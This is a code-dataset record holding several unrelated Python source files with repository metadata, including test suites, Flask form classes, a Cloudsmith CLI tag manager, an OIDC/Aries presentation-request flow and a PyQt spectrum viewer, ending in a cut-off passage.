0
bda7487b706cb9a94241cf9262532248e9f7dfec
4,617
py
Python
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
2
2021-11-07T10:17:16.000Z
2021-11-07T10:17:19.000Z
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
5
2021-11-03T12:43:03.000Z
2021-12-16T10:34:52.000Z
tests/export_traces_test.py
galizia-lab/pyview
07bef637b0c60fae8830c1b3947e4a7bcd14bb2c
[ "BSD-3-Clause" ]
1
2021-09-23T15:46:26.000Z
2021-09-23T15:46:26.000Z
from common import initialize_test_yml_list_measurement from view import VIEW import pathlib as pl import shutil from view.python_core.ctvs import get_all_available_ctvs from view.python_core.gdm_generation.gdm_data_classes import GDMFile class TraceExporter(object): def __init__(self): super().__init__() test_yml, self.test_animal, self.test_measu = initialize_test_yml_list_measurement() self.view = VIEW() self.view.update_flags_from_ymlfile(test_yml) def load_and_export(self, flags_to_update, file_suffix, flags_suffix): self.view.update_flags(flags_to_update) self.view.initialize_animal(self.test_animal) roi_data_dict, roi_file = self.view.get_roi_info_for_current_animal() # initialize and empty data frame to accumulate data gdm_file = GDMFile() # iterate over measurements of the animal for measu in self.view.get_measus_for_current_animal(analyze_values_to_use=(1,)): # load a measurement for the animal self.view.load_measurement_data_from_current_animal(measu) # calculate signals self.view.calculate_signals() # create glodatamix for the loaded measurement gdm_file_this_measu, _ = self.view.get_gdm_file_for_current_measurement(roi_data_dict) # accumulate gdm_file.append_from_a_gdm_file(gdm_file_this_measu) # compose output file name output_file = self.view.flags.get_gloDatamix_file_for_current_animal() output_file_path = pl.Path(output_file) test_gdm_folder =\ pl.Path(self.view.flags["STG_OdorReportPath"]) / "test_gdms" / \ f"{output_file_path.stem}{file_suffix}" if not test_gdm_folder.is_dir(): test_gdm_folder.mkdir(parents=True) test_output_file = test_gdm_folder / f"gdm{flags_suffix}{output_file_path.suffix}" # save gloDatamix file gdm_file.write_to_csv(test_output_file) def test_export_traces_rois(): """ Testing exporting traces using .roi files """ exporter = TraceExporter() coor_path = pl.Path(exporter.view.flags["STG_OdormaskPath"]) dest_roi_file = coor_path / "Fake_data.roi" for fle in coor_path.iterdir(): if fle.name.startswith("FakeData") and fle.suffix == ".roi": shutil.copy(str(fle), str(dest_roi_file)) exporter.load_and_export( flags_to_update={"RM_ROITrace": 3}, file_suffix=f"_from_roi{fle.stem.lstrip('FakeData')}", flags_suffix="_defaults" ) dest_roi_file.unlink() def test_export_traces_mask_tif(): """ Testing exporting traces using .roi.tif files """ exporter = TraceExporter() exporter.load_and_export( flags_to_update={"RM_ROITrace": 4}, file_suffix="_from_roi_tif", flags_suffix="_defaults" ) def test_export_traces_different_ctvs(): """ Testing exporting traces with different CTVs """ exporter = TraceExporter() for ctv in get_all_available_ctvs(): exporter.load_and_export( flags_to_update={"RM_ROITrace": 3, "CTV_Method": ctv}, file_suffix=f"_from_roi", flags_suffix=f"_ctv{ctv}" ) def test_export_traces_within_ROI(): """ Testing exporting traces considering the area file """ exporter = TraceExporter() exporter.load_and_export( flags_to_update={"RM_ROITrace": 3, "GDM_withinArea": True}, file_suffix="_from_roi", flags_suffix="_withinArea_True" ) def test_export_traces_chunks_only(): """ Testing exporting traces considering the area file """ exporter = TraceExporter() exporter.load_and_export( flags_to_update= { "RM_ROITrace": 3, "GDM_outputType": "chunks_only", "GDM_chunkPostStim": 2, # in seconds "GDM_chunkPreStim": 2, # in seconds }, file_suffix="_chunks_only", flags_suffix="_2secPrePostStim" ) exporter.load_and_export( flags_to_update= { "RM_ROITrace": 3, "GDM_outputType": "chunks_only", "GDM_chunkPostStim": 100, # in seconds "GDM_chunkPreStim": 100, # in seconds }, file_suffix="_chunks_only", flags_suffix="_full" ) if __name__ == '__main__': test_export_traces_rois() # test_export_traces_mask_tif() # test_export_traces_within_ROI() test_export_traces_chunks_only()
27.981818
98
0.65627
566
4,617
4.922261
0.236749
0.031587
0.051687
0.045226
0.335607
0.208543
0.208543
0.208543
0.179828
0.179828
0
0.004638
0.252762
4,617
165
99
27.981818
0.802899
0.126922
0
0.225806
0
0
0.131118
0.029419
0
0
0
0
0
1
0.075269
false
0
0.064516
0
0.150538
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda7fb3776a5d1e908f28700d29753c520db4037
2,551
py
Python
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
app/entries/forms.py
singh-prashant/blog
7c4d2e2d6890d3f0b48741b1090e41a990cad1de
[ "MIT" ]
null
null
null
from wtforms import Form, StringField, TextAreaField,SelectField, FileField,HiddenField from wtforms.validators import DataRequired, Optional, Email, URL, Length from models import Entry, Tag class TagField(StringField): def _value(self): if self.data: #Display tags as a comma-separated list. return ', '.join([tag.name for tag in self.data]) return '' def get_tags_from_string(self, tag_string): raw_tags = tag_string.split(',') #Filter out any empty tag tag_names = [name.strip() for name in raw_tags if name.strip()] #Query the database and retrieve any tags we have already saved existing_tags = Tag.query.filter(Tag.name.in_(tag_names)) #Determine which tag names are new. new_names = set(tag_names) - set([tag.name for tag in existing_tags]) #Create a list of unsaved Tag instances for the new tags new_tags = [Tag(name=name) for name in new_names] #Return all the existing tags + all new, unsaved tags return list(existing_tags)+new_tags def process_formdata(self, valuelist): if valuelist: self.data = self.get_tags_from_string(valuelist[0]) else: self.data = [] class ImageForm(Form): file = FileField('Image File') class EntryForm(Form): title = StringField('Title', validators=[DataRequired()]) body = TextAreaField('Body', validators=[DataRequired()]) status = SelectField( 'Entry Status', choices=( (Entry.STATUS_PUBLIC,'Public'), (Entry.STATUS_DRAFT,'Draft')), coerce=int ) tags = TagField( 'Tag', description='Separate multiple tags with commas.' ) def save_entry(self, entry): self.populate_obj(entry) entry.generate_slug() return entry class CommentForm(Form): name = StringField('Name',validators=[DataRequired()]) email = StringField('Email',validators=[DataRequired(),Email()]) url = StringField('Url', validators=[Optional(), URL()]) body = TextAreaField('Comment', validators=[DataRequired(),Length(min=10, max=3000)]) entry_id = HiddenField(validators=[DataRequired()]) def validate(self): if not super(CommentForm, self).validate(): return False entry = Entry.query.filter( (Entry.status == Entry.STATUS_PUBLIC), (Entry.id == self.entry_id.data) ).first() if not entry: return False return True
31.109756
89
0.633477
301
2,551
5.265781
0.355482
0.083281
0.012618
0.016404
0.018927
0
0
0
0
0
0
0.003686
0.255586
2,551
82
90
31.109756
0.830964
0.104273
0
0.035714
0
0
0.044737
0
0
0
0
0
0
1
0.089286
false
0
0.053571
0
0.517857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda9a1746f79218c2ab9314175f0e74a63028e6b
11,323
py
Python
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
19
2018-02-14T23:48:27.000Z
2022-03-12T20:58:09.000Z
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
68
2017-12-03T04:16:55.000Z
2022-03-03T09:45:48.000Z
cloudsmith_cli/cli/commands/tags.py
ThomasAdam/cloudsmith-cli
c335645bf947381a8f5c287bcc0ca6de7a809bdd
[ "Apache-2.0" ]
10
2017-12-25T14:36:24.000Z
2021-12-10T11:10:59.000Z
# -*- coding: utf-8 -*- """CLI/Commands - List objects.""" from __future__ import absolute_import, print_function, unicode_literals from operator import itemgetter import click from ...core.api.packages import ( get_package_tags as api_get_package_tags, tag_package as api_tag_package, ) from .. import command, decorators, utils, validators from ..exceptions import handle_api_exceptions from ..utils import maybe_spinner from .main import main def _parse_tags(tags): """Parse tags from CSV into a list.""" return [x.strip() for x in (tags or "").split(",")] def _print_tags(opts, all_tags, all_immutable_tags): """Print the tags for a package.""" all_combined_tags = {"tags": all_tags, "tags_immutable": all_immutable_tags} if utils.maybe_print_as_json(opts, all_combined_tags): return headers = ["Tag", "Type", "Immutable"] rows = [] for tag_type, tags in sorted(all_tags.items(), key=itemgetter(0)): immutable_tags = all_immutable_tags.get(tag_type) or [] for tag in sorted(tags): immutable = "Yes" if tag in immutable_tags else "No" rows.append( [ click.style(tag, fg="cyan"), click.style(tag_type, fg="yellow"), click.style(immutable, fg="magenta"), ] ) if all_tags: click.echo() utils.pretty_print_table(headers, rows) click.echo() num_results = len(rows) list_suffix = "tag%s" % ("s" if num_results != 1 else "") utils.pretty_print_list_info(num_results=num_results, suffix=list_suffix) @main.group(name="tags", cls=command.AliasGroup, aliases=["tag"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.pass_context def tags_(ctx, opts): # pylint: disable=unused-argument """ Manage the tags for a package in a repository. See the help for subcommands for more information on each. """ @tags_.command(name="list", aliases=["ls"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.pass_context def list_tags(ctx, opts, owner_repo_package): """ List tags for a package in a repository. This requires appropriate (read) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. Full CLI example: $ cloudsmith tags list your-org/awesome-repo/better-pkg """ owner, repo, package = owner_repo_package click.echo( "Listing tags for the '%(package)s' package ... " % {"package": click.style(package, bold=True)}, nl=False, ) context_msg = "Failed to list tags for the package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_get_package_tags( owner=owner, repo=repo, identifier=package ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="add") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.option( "--immutable", default=False, is_flag=True, help=( "If true, the tags created will be immutable (cannot be changed). In " "practice, this means the tags cannot be (easily) deleted. A repository " "admin can explicitly remove immutable tags." ), ) @click.pass_context def add_tags(ctx, opts, owner_repo_package, tags, immutable): """ Add tags to a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to add. Example: foo,bar Full CLI example: $ cloudsmith tags add your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Adding '%(tags)s' tag%(s)s to the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to add tags to package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "add", "tags": tags, "is_immutable": immutable}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="clear") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.pass_context def clear_tags(ctx, opts, owner_repo_package): """ Clear all existing (non-immutable) tags from a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. Full CLI example: $ cloudsmith tags clear your-org/awesome-repo/better-pkg """ owner, repo, package = owner_repo_package click.echo( "Clearing tags on the '%(package)s' package ... " % {"package": click.style(package, bold=True)}, nl=False, ) context_msg = "Failed to clear tags on package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "clear"} ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="remove", aliases=["rm"]) @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.pass_context def remove_tags(ctx, opts, owner_repo_package, tags): """ Remove tags from a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to remove. Example: foo,bar Full CLI example: $ cloudsmith tags remove your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Removing '%(tags)s' tag%(s)s to the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to remove tags from package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "remove", "tags": tags}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable) @tags_.command(name="replace") @decorators.common_cli_config_options @decorators.common_cli_output_options @decorators.common_api_auth_options @decorators.initialise_api @click.argument( "owner_repo_package", metavar="OWNER/REPO/PACKAGE", callback=validators.validate_owner_repo_package, ) @click.argument("tags", metavar="TAGS") @click.option( "--immutable", default=False, is_flag=True, help=( "If true, the tags created will be immutable (cannot be changed). In " "practice, this means the tags cannot be (easily) deleted. A repository " "admin can explicitly remove immutable tags." ), ) @click.pass_context def replace_tags(ctx, opts, owner_repo_package, tags, immutable): """ Replace all existing (non-immutable) tags on a package in a repository. This requires appropriate (write) permissions for the package. - OWNER/REPO/PACKAGE: Specify the OWNER namespace (i.e. user or org), the REPO name where the package is stored, and the PACKAGE identifier of the package itself. All separated by a slash. Example: 'your-org/awesome-repo/better-pkg'. - TAGS: A comma-separated value list of the tags you want to replace existing with. Example: foo,bar Full CLI example: $ cloudsmith tags replace your-org/awesome-repo/better-pkg foo,bar """ owner, repo, package = owner_repo_package tags = _parse_tags(tags) click.echo( "Replacing existing with '%(tags)s' tag%(s)s on the '%(package)s' package ... " % { "package": click.style(package, bold=True), "tags": click.style(", ".join(tags or [])), "s": "s" if len(tags) != 1 else "", }, nl=False, ) context_msg = "Failed to replace tags on package!" with handle_api_exceptions(ctx, opts=opts, context_msg=context_msg): with maybe_spinner(opts): package_tags, package_tags_immutable = api_tag_package( owner=owner, repo=repo, identifier=package, data={"action": "replace", "tags": tags, "is_immutable": immutable}, ) click.secho("OK", fg="green") _print_tags(opts, package_tags, package_tags_immutable)
31.192837
87
0.666078
1,473
11,323
4.937542
0.12831
0.049498
0.076997
0.031624
0.799808
0.786746
0.774508
0.765434
0.731473
0.731473
0
0.000682
0.222821
11,323
362
88
31.279006
0.825795
0.241191
0
0.624434
0
0.004525
0.159192
0
0
0
0
0
0
1
0.036199
false
0.027149
0.036199
0
0.081448
0.045249
0
0
0
null
0
0
0
0
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
5
bdaa3c35e12cb6be60fdc05cc2cfe86bb78ba70c
764
py
Python
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
tests/test_correct_pesel.py
matee911/pypesel
393e4bf4891b4bbb94cd077b26161dd2e94eed31
[ "Apache-2.0" ]
null
null
null
from pesel import Pesel import pytest @pytest.fixture(scope='session', params=["65432101239"]) def pesel_value(request): return request.param @pytest.fixture(scope='session') def pesel_obj(pesel_value): return Pesel(pesel_value) def test_correct_pesel(pesel_obj, pesel_value): pytest.assume(pesel_obj.value == pesel_value) def test_correct_pesel_gender(pesel_obj): pytest.assume(pesel_obj.gender == 'male') def test_correct_pesel_male(pesel_obj): pytest.assume(pesel_obj.male is True) def test_correct_pesel_year(pesel_obj): pytest.assume(pesel_obj.year == 2165) def test_correct_pesel_month(pesel_obj): pytest.assume(pesel_obj.month == 3) def test_incorrect_pesel_day(pesel_obj): pytest.assume(pesel_obj.day == 21)
20.648649
56
0.764398
113
764
4.858407
0.256637
0.189435
0.185792
0.218579
0.360656
0.360656
0
0
0
0
0
0.026946
0.125654
764
36
57
21.222222
0.79491
0
0
0
0
0
0.037958
0
0
0
0
0
0
1
0.4
false
0
0.1
0.1
0.6
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
4
bdab079e812edf7ae50cfd1cbee57eb0f820a648
5,978
py
Python
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
oidc/endpoints/authorize.py
didx-xyz/yoma-oidc-bridge
7e3ff6ab3ea4fed01cd7d4c113c7c3b3244356eb
[ "Apache-2.0" ]
null
null
null
from aca.client import ACAClient from aries_cloudcontroller.aries_controller import AriesAgentController from asgiref.sync import sync_to_async, async_to_sync from django.utils import timezone from datetime import timedelta from aca.models import PresentationFactory from oidc.utils.shortener import create_short_url from oidc.models import AuthSession, PresentationConfigurations, MappedUrl from django.conf import settings from datetime import datetime, timedelta import asyncio WEBHOOK_HOST = "https://8b1dec9d51dd.ngrok.io" WEBHOOK_PORT = 443 WEBHOOK_BASE = "https://8b1dec9d51dd.ngrok.io/webhooks/" def authorization(pres_req_conf_id: str, request_parameters: dict): aca_client = ACAClient(settings.ACA_PY_URL, settings.ACA_PY_TRANSPORT_URL) presentation_configuration = PresentationConfigurations.objects.get( id=pres_req_conf_id ) response = aca_client.create_proof_request(presentation_configuration.to_json()) print('PROOF CREATE', response) public_did = aca_client.get_public_did() print('DID', public_did) endpoint = aca_client.get_endpoint_url() print('ENDPOINT', endpoint) presentation_request = PresentationFactory.from_params( presentation_request=response.get("presentation_request"), p_id=response.get("thread_id"), verkey=[public_did.get("verkey")], endpoint=endpoint, ).to_json() print('PROOF REQUEST ', presentation_request) presentation_request_id = response["presentation_exchange_id"] session = AuthSession.objects.create( presentation_record_id=pres_req_conf_id, presentation_request_id=presentation_request_id, presentation_request=presentation_request, request_parameters=request_parameters, expired_timestamp=timezone.now() + timedelta(minutes=60), ) url, b64_presentation = create_short_url(presentation_request) mapped_url = MappedUrl.objects.create(url=url, session=session) short_url = mapped_url.get_short_url() return short_url, str(session.pk), presentation_request_id, b64_presentation @sync_to_async def getPresentationConfig(pres_req_conf_id: str): return PresentationConfigurations.objects.get( id=pres_req_conf_id ) @sync_to_async def createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url): session = AuthSession.objects.create( presentation_record_id=pres_req_conf_id, presentation_request_id=presentation_request_id, presentation_request=presentation_request, request_parameters=request_parameters, expired_timestamp= timezone.now() + timedelta(minutes=60), ) mapped_url = MappedUrl.objects.create(url=url, session=session) print(mapped_url) short_url = mapped_url.get_short_url() print(short_url) return session, mapped_url, short_url async def authorization_async(pres_req_conf_id: str, request_parameters: dict): # Based on the aca-py agent you wish to control # print('AGENT CONNECT') agent_controller = AriesAgentController(admin_url=settings.ACA_PY_URL) # print('ACAPY AGENT CONNECTED') # print('WEBHOOOKS STARTING') # await asyncio.gather(agent_controller.init_webhook_server(webhook_host=WEBHOOK_HOST, webhook_port=WEBHOOK_PORT, webhook_base=WEBHOOK_BASE)) # print('WEBHOOOKS STARTED') presentation_configuration = await getPresentationConfig(pres_req_conf_id) print('PRESENTATION CONFIG: ', presentation_configuration) # response = await agent_controller.proofs.create_request(presentation_configuration.to_json()) response = await asyncio.gather(agent_controller.proofs.create_request(presentation_configuration.to_json())) response = response[0] print('PROOF CREATE: ', response) # TODO - the current DID of the Agent is already ledgered on Stagingnet # This creates a scenario where the endpoint being fetched is wrong # Need to update the code so that new DIDs can be ledgered to stagingnet together with endpoints public_did = await asyncio.gather(agent_controller.wallet.get_public_did()) public_did = public_did[0]['result'] print('PUBLIC DID: ', public_did) endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did'])) endpoint = endpoint[0]['endpoint'] print('ENDPOINT: ', endpoint) # TODO - this will wail due to no TAA accepted on ledger TAA_response = await agent_controller.ledger.get_taa() TAA = TAA_response['result']['taa_record'] TAA['mechanism'] = "service_agreement" # print(TAA) TAA_accept = await agent_controller.ledger.accept_taa(TAA) ## Will return {} if successful print(TAA_accept) await asyncio.gather(agent_controller.wallet.set_did_endpoint(public_did['did'], settings.ACA_PY_TRANSPORT_URL, 'Endpoint')) endpoint = await asyncio.gather(agent_controller.ledger.get_did_endpoint(public_did['did'])) endpoint = endpoint[0]['endpoint'] print('ENDPOINT ', endpoint) presentation_request = PresentationFactory.from_params( presentation_request=response.get("presentation_request"), p_id=response.get("thread_id"), verkey=[public_did.get("verkey")], endpoint=endpoint, ).to_json() print('PROOF REQUEST: ', presentation_request) presentation_request_id = response["presentation_exchange_id"] url, b64_presentation = create_short_url(presentation_request) print(url) session, mapped_url, short_url = await createSession(pres_req_conf_id, presentation_request_id, presentation_request, request_parameters, url) print('SESSION ', session) print('sessionpk: ', str(session.pk)) print('mapped_url: ', mapped_url) print('short_url: ', short_url) print('presx_id: ', presentation_request_id) print('b64 presx: ', b64_presentation) await agent_controller.terminate() return short_url, str(session.pk), presentation_request_id, b64_presentation
42.7
146
0.761124
732
5,978
5.915301
0.202186
0.118476
0.053349
0.030023
0.564896
0.5
0.481986
0.469053
0.40485
0.381293
0
0.006485
0.148712
5,978
139
147
43.007194
0.84437
0.119438
0
0.423077
0
0
0.085366
0.009146
0
0
0
0.007194
0
1
0.028846
false
0
0.105769
0.009615
0.173077
0.192308
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdad84b4bff0650ac95c00b90cecccaf57a977f3
425
py
Python
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
2
2019-03-05T15:42:46.000Z
2019-07-24T15:52:36.000Z
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
null
null
null
BOJ17207.py
INYEONGKIM/BOJ
5e83d77a92d18b0d20d26645c7cfe4ba3e2d25bc
[ "MIT" ]
null
null
null
a=[];b=[];t=[];task=[0]*5;n=['Youngki','Jinwoo','Jungwoo','Junsuk','Inseo'] for _ in range(5): a.append([int(i) for i in input().split()]) t.append([0]*5) for _ in range(5): b.append([int(i) for i in input().split()]) for i in range(5): for j in range(5): for k in range(5): t[i][j]+=a[i][k]*b[k][j] for i in range(5): task[i]=sum(t[i]) task=task[::-1] print(n[task.index(min(task))])
28.333333
75
0.531765
85
425
2.635294
0.317647
0.1875
0.214286
0.098214
0.339286
0.232143
0.232143
0.232143
0
0
0
0.031884
0.188235
425
14
76
30.357143
0.617391
0
0
0.285714
0
0
0.072941
0
0
0
0
0
0
1
0
false
0
0
0
0
0.071429
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
bdae540df0f84f457e5404b4e6682360e4f75f83
5,163
py
Python
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
psana/psana/graphqt/IVSpectrum.py
ZLLentz/lcls2
3edbea556779f619944ee9b97fb33cd815a19a37
[ "BSD-3-Clause-LBNL" ]
null
null
null
"""Class :py:class:`IVSpectrum` is a QWidget with histogram, two axes, and color bar ==================================================================================== Usage :: # Run test: python lcls2/psana/psana/graphqt/IVSpectrum.py from psana.graphqt.IVSpectrum import IVSpectrum w = IVSpectrum() Created on 2021-06-22 by Mikhail Dubrovin """ import logging logger = logging.getLogger(__name__) from psana.graphqt.FWViewHist import FWViewHist from psana.graphqt.FWViewAxis import FWViewAxis from psana.graphqt.FWViewColorBar import FWViewColorBar import psana.graphqt.ColorTable as ct from PyQt5.QtWidgets import QWidget, QGridLayout, QPushButton, QTextEdit from PyQt5.QtCore import Qt, QRectF def test_image(): import psana.pyalgos.generic.NDArrGenerators as ag return ag.random_standard((8,12), mu=0, sigma=10) class IVSpectrum(QWidget): """QWidget for Image Viewer""" def __init__(self, **kwargs): parent = kwargs.get('parent', None) image = kwargs.get('image', test_image()) QWidget.__init__(self, parent) ctab = ct.color_table_interpolated() rs=QRectF(0, 0, 100, 1000) self.whis = FWViewHist(self, rs, origin='DR', scale_ctl='V', fgcolor='yellow', bgcolor='dark', orient='V') self.wcbar = FWViewColorBar(self, coltab=ctab, orient='V') r = self.whis.sceneRect() rscx = QRectF(r.x(), 0, r.width(), 1) rscy = QRectF(0, r.y(), 1, r.height()) self.wax = FWViewAxis(None, rscx, side='U', origin='UR', scale_ctl=True, wwidth=30, wlength=200) self.way = FWViewAxis(None, rscy, side='L', origin='DL', scale_ctl=True, wwidth=60, wlength=200) self.but_reset = QPushButton('Reset') self.edi_info = QTextEdit('Info') self.box = QGridLayout() self.box.setSpacing(0) self.box.setVerticalSpacing(0) self.box.setHorizontalSpacing(0) self.box.addWidget(self.edi_info, 0, 0, 1, 11) self.box.addWidget(self.way, 1, 10, 9, 1) self.box.addWidget(self.whis, 1, 0, 9, 10) self.box.addWidget(self.wax, 10, 0, 1, 9) self.box.addWidget(self.wcbar, 1, 9, 9, 1) self.box.addWidget(self.but_reset, 10, 9, 1, 2, alignment=Qt.AlignCenter) self.setLayout(self.box) self.set_tool_tips() self.set_style() self.connect_scene_rect_changed() self.but_reset.clicked.connect(self.on_but_reset) def connect_scene_rect_changed(self): self.whis.connect_scene_rect_changed_to(self.on_whis_scene_rect_changed) self.wax.connect_scene_rect_changed_to(self.on_wax_scene_rect_changed) self.way.connect_scene_rect_changed_to(self.on_way_scene_rect_changed) def disconnect_scene_rect_changed(self): self.whis.disconnect_scene_rect_changed_from(self.on_whis_scene_rect_changed) self.wax.disconnect_scene_rect_changed_from(self.on_wax_scene_rect_changed) self.way.disconnect_scene_rect_changed_from(self.on_way_scene_rect_changed) def on_but_reset(self): logger.debug('on_but_reset') if self.whis is not None: self.whis.reset_original_size() def on_whis_scene_rect_changed(self, r): #logger.debug('on_whis_scene_rect_changed: %s'%str(r)) self.wax.set_view(rs=QRectF(r.x(), 0, r.width(), 1)) self.way.set_view(rs=QRectF(0, r.y(), 1, r.height())) self.update_info() def on_wax_scene_rect_changed(self, r): #logger.debug('on_wax_scene_rect_changed: %s'%str(r)) rs = self.whis.scene().sceneRect() self.whis.set_view(rs=QRectF(r.x(), rs.y(), r.width(), rs.height())) def on_way_scene_rect_changed(self, r): #logger.debug('on_way_scene_rect_changed: %s'%str(r)) rs = self.whis.scene().sceneRect() self.whis.set_view(rs=QRectF(rs.x(), r.y(), rs.width(), r.height())) self.update_info() def update_info(self): r = self.whis.scene().sceneRect() self.edi_info.setText('Spectrum min: %d max: %d' % (r.y(), r.y()+r.height())) def set_tool_tips(self): self.whis.setToolTip('Spectrum') def set_style(self): self.layout().setContentsMargins(0,0,0,0) #self.but_reset.setFixedSize(60,30) self.wcbar.setFixedWidth(25) #self.edi_info.setFixedHeight(100) self.edi_info.setMaximumHeight(50) def set_pixmap_from_arr(self, arr, set_def=True): """shortcat to image""" self.whis.set_pixmap_from_arr(arr, set_def) def reset_original_size(self): """shortcat to image""" self.whis.reset_original_size() if __name__ == "__main__": import os import sys os.environ['LIBGL_ALWAYS_INDIRECT'] = '1' #export LIBGL_ALWAYS_INDIRECT=1 from PyQt5.QtWidgets import QApplication logging.basicConfig(format='[%(levelname).1s] L%(lineno)04d %(name)s : %(message)s', level=logging.DEBUG) app = QApplication(sys.argv) w = IVSpectrum() w.setGeometry(100, 50, 300, 800) w.setWindowTitle('Image with two axes') w.show() app.exec_() del w del app # EOF
32.88535
114
0.650978
723
5,163
4.432918
0.26556
0.05897
0.104836
0.062403
0.313885
0.263027
0.206864
0.127925
